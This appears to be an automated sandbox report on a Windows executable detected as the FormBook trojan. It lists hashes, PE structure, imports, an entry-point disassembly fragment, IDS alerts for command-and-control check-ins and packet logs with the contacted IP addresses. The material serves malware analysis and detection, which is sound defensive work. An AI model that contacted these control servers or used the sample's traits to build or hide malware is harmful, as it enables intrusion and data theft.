SHA1:	16B4D54B227860CD7942CB26F607C2464F69B416
SHA-256:	1F1B9BB21DBBE012A4824C25111BAB849BE0E7BCED9234527701823A68C65374
SHA-512:	4F82F38C3A3D93FED9E1D0A27D1993FAA723CD2C0AD08241F1FC8C93E1DFAF47E035A94A2075B828AD12D41C6860150C3B42EE79B060912EBC44D340C8CDA492
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFFF783F681E8F6EBB.TMP Download File
Process:	C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	1.021204976774085
Encrypted:	false
SSDEEP:	48:rJSq2Upu8metqPrIXHimU7zdvP1vnRecR:VSKUpACLF0
MD5:	E9F7C24086FE230572BB84C262385677
SHA1:	16B4D54B227860CD7942CB26F607C2464F69B416
SHA-256:	1F1B9BB21DBBE012A4824C25111BAB849BE0E7BCED9234527701823A68C65374
SHA-512:	4F82F38C3A3D93FED9E1D0A27D1993FAA723CD2C0AD08241F1FC8C93E1DFAF47E035A94A2075B828AD12D41C6860150C3B42EE79B060912EBC44D340C8CDA492
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.18115352999971
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Zr26f1rL6r.exe
File size:	144472
MD5:	812181df251e06433bf2f4f6a0c0f0f4
SHA1:	aa38a567ee48483d98966622fd320c791bc45871
SHA256:	4d6c910a379d00f329e55ad98a7817de0370695566443a74a9a02c85d2463a9d
SHA512:	4d34981930ed3e40572cfc761dcb78e59494d8e33f2e6615ed3e53d3e17945718d7d627abca099167e188e2e76973a550c64c54a3f6700bb6bbb7b13bbd0cf47
SSDEEP:	3072:txD6tQfQC/nHcs0lZ8+g81AYe22uQCNIJXmeL5A2m:txDQgvHyY80oQCNQm
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...<!..v...E%..r...Richs...........................PE..L....H.X.....................0....................@

File Icon


Icon Hash:	6ce8fac8c8e46868

Static PE Info

General
Entrypoint:	0x4013b4
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x58DD4808 [Thu Mar 30 18:01:44 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	0db4e1fdede6848b7d67f260c767df5d

Authenticode Signature

Signature Valid:	false
Signature Issuer:	E=Knyste6@Eximiousne3.BRY, CN=Siphonalet4, OU=Dehumanise5, O=octocorall, L=Myomatous7, S=FAHLORE, C=TD
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	24/11/2021 12:22:16 24/11/2022 12:22:16
Subject Chain	E=Knyste6@Eximiousne3.BRY, CN=Siphonalet4, OU=Dehumanise5, O=octocorall, L=Myomatous7, S=FAHLORE, C=TD
Version:	3
Thumbprint MD5:	3EA4D95D319B3BCDDF3A916A0A7F25DF
Thumbprint SHA-1:	827D80430EC06C8058A205E7E710FFF3EB2A03DE
Thumbprint SHA-256:	7824D156B89CF1BF25F923BECB9DCE0EF3F49C821D270075A626DE65497E77AD
Serial:	00

Entrypoint Preview

Instruction
push 00402510h
call 00007F0798A3AAD5h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
cmp byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xlatb
lds ebx, edx
mov bl, 87h
fisttp dword ptr [edi-6Ch]
push ebp
inc ecx
dec eax
jmp far 0000h : 00DCC60Ah
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+45h], dl
push edx
dec ecx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
sub eax, B60C4E3Eh
test eax, B24EE131h
cmp eax, 043AB174h
imul ebp, dword ptr [edx], 2411205Eh
push ss
pushad
bound eax, dword ptr [ebp-64h]
mov byte ptr [esi], FFFFFF8Ah
push ds

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1f144	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x22000	0xf77	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x22000	0x1458
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x238	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x13c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1e6c0	0x1f000	False	0.523012222782	data	6.34448502446	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x20000	0x1a40	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x22000	0xf77	0x1000	False	0.367431640625	data	4.13632936066	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
CUSTOM	0x22d3b	0x23c	ASCII text, with CRLF line terminators	English	United States
CUSTOM	0x22d18	0x23	ASCII text, with CRLF line terminators	English	United States
RT_ICON	0x22470	0x8a8	data
RT_GROUP_ICON	0x2245c	0x14	data
RT_VERSION	0x22170	0x2ec	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

__vbaStrI2, _CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaErase, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaCyI2, __vbaStrCmp, DllFunctionCall, __vbaVarLateMemSt, _adj_fpatan, __vbaLateIdCallLd, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaStrToAnsi, __vbaVarDup, __vbaVarCopy, _CIatan, __vbaStrMove, __vbaI4Cy, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0409 0x04b0
LegalCopyright	Mon Frak
InternalName	UNDERWR
FileVersion	1.00
CompanyName	Mon Frak
LegalTrademarks	Mon Frak
Comments	Mon Frak
ProductName	Mon Frak
ProductVersion	1.00
FileDescription	Mon Frak
OriginalFilename	UNDERWR.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
11/25/21-12:56:13.220035	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49815	80	192.168.11.20	104.21.76.223
11/25/21-12:56:13.220035	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49815	80	192.168.11.20	104.21.76.223
11/25/21-12:56:13.220035	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49815	80	192.168.11.20	104.21.76.223
11/25/21-12:56:34.061801	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49817	80	192.168.11.20	164.155.212.139
11/25/21-12:56:34.061801	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49817	80	192.168.11.20	164.155.212.139
11/25/21-12:56:34.061801	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49817	80	192.168.11.20	164.155.212.139
11/25/21-12:56:39.949611	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49818	80	192.168.11.20	172.120.157.187
11/25/21-12:56:39.949611	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49818	80	192.168.11.20	172.120.157.187
11/25/21-12:56:39.949611	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49818	80	192.168.11.20	172.120.157.187
11/25/21-12:56:50.191875	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49819	80	192.168.11.20	3.64.163.50
11/25/21-12:56:50.191875	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49819	80	192.168.11.20	3.64.163.50
11/25/21-12:56:50.191875	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49819	80	192.168.11.20	3.64.163.50
11/25/21-12:57:19.581032	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.11.20	9.9.9.9
11/25/21-12:57:48.440285	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49823	80	192.168.11.20	172.67.164.153
11/25/21-12:57:48.440285	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49823	80	192.168.11.20	172.67.164.153
11/25/21-12:57:48.440285	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49823	80	192.168.11.20	172.67.164.153
11/25/21-12:57:53.969955	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49824	80	192.168.11.20	3.64.163.50
11/25/21-12:57:53.969955	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49824	80	192.168.11.20	3.64.163.50
11/25/21-12:57:53.969955	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49824	80	192.168.11.20	3.64.163.50
11/25/21-12:58:24.837935	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49826	80	192.168.11.20	3.64.163.50
11/25/21-12:58:24.837935	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49826	80	192.168.11.20	3.64.163.50
11/25/21-12:58:24.837935	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49826	80	192.168.11.20	3.64.163.50
11/25/21-12:58:46.492771	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.11.20	9.9.9.9
11/25/21-12:58:54.460181	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.11.20	9.9.9.9
11/25/21-12:59:11.009465	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.11.20	9.9.9.9
11/25/21-12:59:26.513558	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.11.20	9.9.9.9
11/25/21-13:00:06.831291	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.11.20	1.1.1.1
11/25/21-13:00:30.897806	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.11.20	1.1.1.1
11/25/21-13:00:58.958116	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49836	80	192.168.11.20	3.64.163.50
11/25/21-13:00:58.958116	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49836	80	192.168.11.20	3.64.163.50
11/25/21-13:00:58.958116	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49836	80	192.168.11.20	3.64.163.50
11/25/21-13:01:05.901849	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.11.20	9.9.9.9
11/25/21-13:01:29.228115	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.11.20	9.9.9.9
11/25/21-13:01:53.595063	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49843	80	192.168.11.20	34.102.136.180
11/25/21-13:01:53.595063	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49843	80	192.168.11.20	34.102.136.180
11/25/21-13:01:53.595063	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49843	80	192.168.11.20	34.102.136.180
11/25/21-13:01:53.704468	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49843	34.102.136.180	192.168.11.20

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2021 12:54:53.951297998 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:53.951342106 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:53.951580048 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:53.963933945 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:53.963953972 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:54.201822996 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:54.202085018 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.320291042 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.320346117 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:54.320997000 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:54.321127892 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.330709934 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.371917963 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:54.442766905 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:54.442869902 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:54.442977905 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.443044901 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:54.443062067 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.443084002 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.443098068 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.443258047 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.553422928 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:54.553611994 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.553674936 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.553746939 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:54.554040909 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.664602995 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:54.664783001 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.664937019 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.664968967 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:54.664994001 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:54.665100098 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.665122986 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.665143967 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.665154934 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.665286064 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.665311098 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:54.665334940 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:54.665456057 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.665483952 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.665493965 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.665503025 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.665663004 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.706569910 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:54.706798077 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.706840038 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.706851006 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.776314974 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:54.776477098 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.776499033 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:54.776556015 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.776578903 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:54.776724100 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:54.776803017 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.776829958 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:54.776972055 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:54.777164936 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.777213097 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:54.777225018 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.777359962 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.777489901 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.816994905 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:54.817177057 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.817222118 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.887572050 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:54.887908936 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.888024092 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:54.888269901 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.888319969 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:54.888622999 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.888643980 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:54.888664007 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:54.888896942 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.888992071 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.889079094 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:54.889301062 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.889318943 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.889348030 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.889451981 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.889509916 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:54.889736891 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.889928102 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.890124083 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.927294970 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:54.927547932 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:54.927581072 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:55.000137091 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:55.000278950 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:55.000294924 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:55.000313044 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:55.000415087 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:55.000448942 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:55.000487089 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:55.000576973 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:55.000770092 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:55.000848055 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:55.000899076 CET	443	49812	107.6.148.162	192.168.11.20
Nov 25, 2021 12:54:55.000907898 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:54:55.001101017 CET	49812	443	192.168.11.20	107.6.148.162
Nov 25, 2021 12:56:13.210881948 CET	49815	80	192.168.11.20	104.21.76.223
Nov 25, 2021 12:56:13.219788074 CET	80	49815	104.21.76.223	192.168.11.20
Nov 25, 2021 12:56:13.219952106 CET	49815	80	192.168.11.20	104.21.76.223
Nov 25, 2021 12:56:13.220035076 CET	49815	80	192.168.11.20	104.21.76.223
Nov 25, 2021 12:56:13.228821039 CET	80	49815	104.21.76.223	192.168.11.20
Nov 25, 2021 12:56:13.382391930 CET	80	49815	104.21.76.223	192.168.11.20
Nov 25, 2021 12:56:13.382405996 CET	80	49815	104.21.76.223	192.168.11.20
Nov 25, 2021 12:56:13.382580996 CET	80	49815	104.21.76.223	192.168.11.20
Nov 25, 2021 12:56:13.382910967 CET	49815	80	192.168.11.20	104.21.76.223
Nov 25, 2021 12:56:13.382925987 CET	49815	80	192.168.11.20	104.21.76.223
Nov 25, 2021 12:56:13.382930040 CET	49815	80	192.168.11.20	104.21.76.223
Nov 25, 2021 12:56:28.520108938 CET	49816	80	192.168.11.20	81.2.194.128
Nov 25, 2021 12:56:28.546658993 CET	80	49816	81.2.194.128	192.168.11.20
Nov 25, 2021 12:56:28.546880007 CET	49816	80	192.168.11.20	81.2.194.128
Nov 25, 2021 12:56:28.546938896 CET	49816	80	192.168.11.20	81.2.194.128
Nov 25, 2021 12:56:28.573829889 CET	80	49816	81.2.194.128	192.168.11.20
Nov 25, 2021 12:56:28.576894045 CET	80	49816	81.2.194.128	192.168.11.20
Nov 25, 2021 12:56:28.576960087 CET	80	49816	81.2.194.128	192.168.11.20
Nov 25, 2021 12:56:28.577003002 CET	80	49816	81.2.194.128	192.168.11.20
Nov 25, 2021 12:56:28.577404022 CET	49816	80	192.168.11.20	81.2.194.128
Nov 25, 2021 12:56:28.577503920 CET	49816	80	192.168.11.20	81.2.194.128
Nov 25, 2021 12:56:28.604295015 CET	80	49816	81.2.194.128	192.168.11.20
Nov 25, 2021 12:56:33.893564939 CET	49817	80	192.168.11.20	164.155.212.139
Nov 25, 2021 12:56:34.061499119 CET	80	49817	164.155.212.139	192.168.11.20
Nov 25, 2021 12:56:34.061731100 CET	49817	80	192.168.11.20	164.155.212.139
Nov 25, 2021 12:56:34.061800957 CET	49817	80	192.168.11.20	164.155.212.139
Nov 25, 2021 12:56:34.229708910 CET	80	49817	164.155.212.139	192.168.11.20
Nov 25, 2021 12:56:34.568326950 CET	49817	80	192.168.11.20	164.155.212.139
Nov 25, 2021 12:56:34.717901945 CET	80	49817	164.155.212.139	192.168.11.20
Nov 25, 2021 12:56:34.717962980 CET	80	49817	164.155.212.139	192.168.11.20
Nov 25, 2021 12:56:34.718271017 CET	49817	80	192.168.11.20	164.155.212.139
Nov 25, 2021 12:56:34.718367100 CET	49817	80	192.168.11.20	164.155.212.139
Nov 25, 2021 12:56:34.727014065 CET	80	49817	164.155.212.139	192.168.11.20
Nov 25, 2021 12:56:34.727236986 CET	49817	80	192.168.11.20	164.155.212.139
Nov 25, 2021 12:56:34.736188889 CET	80	49817	164.155.212.139	192.168.11.20
Nov 25, 2021 12:56:34.736525059 CET	49817	80	192.168.11.20	164.155.212.139
Nov 25, 2021 12:56:39.787911892 CET	49818	80	192.168.11.20	172.120.157.187
Nov 25, 2021 12:56:39.949301004 CET	80	49818	172.120.157.187	192.168.11.20
Nov 25, 2021 12:56:39.949527025 CET	49818	80	192.168.11.20	172.120.157.187
Nov 25, 2021 12:56:39.949610949 CET	49818	80	192.168.11.20	172.120.157.187
Nov 25, 2021 12:56:40.114429951 CET	80	49818	172.120.157.187	192.168.11.20
Nov 25, 2021 12:56:40.114500999 CET	80	49818	172.120.157.187	192.168.11.20
Nov 25, 2021 12:56:40.114938974 CET	49818	80	192.168.11.20	172.120.157.187
Nov 25, 2021 12:56:40.115042925 CET	49818	80	192.168.11.20	172.120.157.187
Nov 25, 2021 12:56:40.276146889 CET	80	49818	172.120.157.187	192.168.11.20
Nov 25, 2021 12:56:50.179936886 CET	49819	80	192.168.11.20	3.64.163.50
Nov 25, 2021 12:56:50.191602945 CET	80	49819	3.64.163.50	192.168.11.20
Nov 25, 2021 12:56:50.191821098 CET	49819	80	192.168.11.20	3.64.163.50
Nov 25, 2021 12:56:50.191874981 CET	49819	80	192.168.11.20	3.64.163.50
Nov 25, 2021 12:56:50.203303099 CET	80	49819	3.64.163.50	192.168.11.20
Nov 25, 2021 12:56:50.203358889 CET	80	49819	3.64.163.50	192.168.11.20
Nov 25, 2021 12:56:50.203393936 CET	80	49819	3.64.163.50	192.168.11.20
Nov 25, 2021 12:56:50.203674078 CET	49819	80	192.168.11.20	3.64.163.50
Nov 25, 2021 12:56:50.203726053 CET	49819	80	192.168.11.20	3.64.163.50
Nov 25, 2021 12:56:50.215117931 CET	80	49819	3.64.163.50	192.168.11.20
Nov 25, 2021 12:57:05.760725975 CET	49820	80	192.168.11.20	203.170.80.250
Nov 25, 2021 12:57:06.036005020 CET	80	49820	203.170.80.250	192.168.11.20
Nov 25, 2021 12:57:06.036355019 CET	49820	80	192.168.11.20	203.170.80.250
Nov 25, 2021 12:57:06.036454916 CET	49820	80	192.168.11.20	203.170.80.250
Nov 25, 2021 12:57:06.312331915 CET	80	49820	203.170.80.250	192.168.11.20
Nov 25, 2021 12:57:06.315325022 CET	80	49820	203.170.80.250	192.168.11.20
Nov 25, 2021 12:57:06.315699100 CET	49820	80	192.168.11.20	203.170.80.250
Nov 25, 2021 12:57:06.315802097 CET	49820	80	192.168.11.20	203.170.80.250
Nov 25, 2021 12:57:06.588951111 CET	80	49820	203.170.80.250	192.168.11.20
Nov 25, 2021 12:57:38.234535933 CET	49822	80	192.168.11.20	88.99.22.5
Nov 25, 2021 12:57:38.249697924 CET	80	49822	88.99.22.5	192.168.11.20
Nov 25, 2021 12:57:38.250005960 CET	49822	80	192.168.11.20	88.99.22.5
Nov 25, 2021 12:57:38.250077963 CET	49822	80	192.168.11.20	88.99.22.5
Nov 25, 2021 12:57:38.265129089 CET	80	49822	88.99.22.5	192.168.11.20
Nov 25, 2021 12:57:38.265187025 CET	80	49822	88.99.22.5	192.168.11.20
Nov 25, 2021 12:57:38.265223980 CET	80	49822	88.99.22.5	192.168.11.20
Nov 25, 2021 12:57:38.265492916 CET	49822	80	192.168.11.20	88.99.22.5
Nov 25, 2021 12:57:38.265538931 CET	49822	80	192.168.11.20	88.99.22.5
Nov 25, 2021 12:57:38.280482054 CET	80	49822	88.99.22.5	192.168.11.20
Nov 25, 2021 12:57:48.430843115 CET	49823	80	192.168.11.20	172.67.164.153
Nov 25, 2021 12:57:48.440013885 CET	80	49823	172.67.164.153	192.168.11.20
Nov 25, 2021 12:57:48.440229893 CET	49823	80	192.168.11.20	172.67.164.153
Nov 25, 2021 12:57:48.440284967 CET	49823	80	192.168.11.20	172.67.164.153
Nov 25, 2021 12:57:48.449387074 CET	80	49823	172.67.164.153	192.168.11.20
Nov 25, 2021 12:57:48.942645073 CET	49823	80	192.168.11.20	172.67.164.153
Nov 25, 2021 12:57:48.952918053 CET	80	49823	172.67.164.153	192.168.11.20
